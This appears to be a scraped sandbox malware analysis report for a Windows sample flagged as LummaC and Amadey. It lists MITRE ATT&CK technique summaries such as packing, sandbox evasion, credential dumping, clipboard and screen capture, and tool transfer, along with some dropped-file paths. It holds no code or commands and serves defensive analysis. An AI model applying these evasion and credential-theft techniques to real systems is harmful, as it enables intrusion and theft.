Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BIMO8YMO89RQ\9HDJWB

C:\ProgramData\BIMO8YMO89RQ\DT2DT0

C:\ProgramData\BIMO8YMO89RQ\FCTR1D2DT

C:\ProgramData\BIMO8YMO89RQ\GVS0HV

C:\ProgramData\BIMO8YMO89RQ\JECTJECTR

C:\ProgramData\BIMO8YMO89RQ\WTR1NG

Windows Analysis Report
file.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre